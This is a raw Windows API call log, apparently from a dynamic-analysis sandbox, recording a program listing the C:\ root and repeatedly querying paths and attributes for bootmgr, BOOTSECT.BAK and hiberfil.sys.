[0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe1939e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe1939e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0246.489] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0246.490] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0246.490] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0246.490] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.490] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.491] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.492] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.493] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.494] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.494] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.494] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0246.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.495] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x7434600 | out: lpFileInformation=0x7434600*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0246.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.495] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.495] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.495] GetFileAttributesExW (in: lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0246.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.495] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0246.624] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.624] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.624] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.625] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.626] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0246.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e260) returned 1 [0246.627] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x26dfa0 | out: lpFindFileData=0x26dfa0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 0x6d28e8 [0246.627] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e25c) returned 1 [0246.627] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0246.627] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x74375d0 | out: lpFileInformation=0x74375d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0246.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0246.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2ac) returned 1 [0246.628] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x26dfec | out: lpFindFileData=0x26dfec*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 0x6d28e8 [0246.628] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2a8) returned 1 [0246.628] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.628] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0246.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.628] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x26e340 | out: lpFileInformation=0x26e340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0246.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0246.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e260) returned 1 [0246.629] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x26dfa0 | out: lpFindFileData=0x26dfa0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 0x6d28e8 [0246.629] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.629] 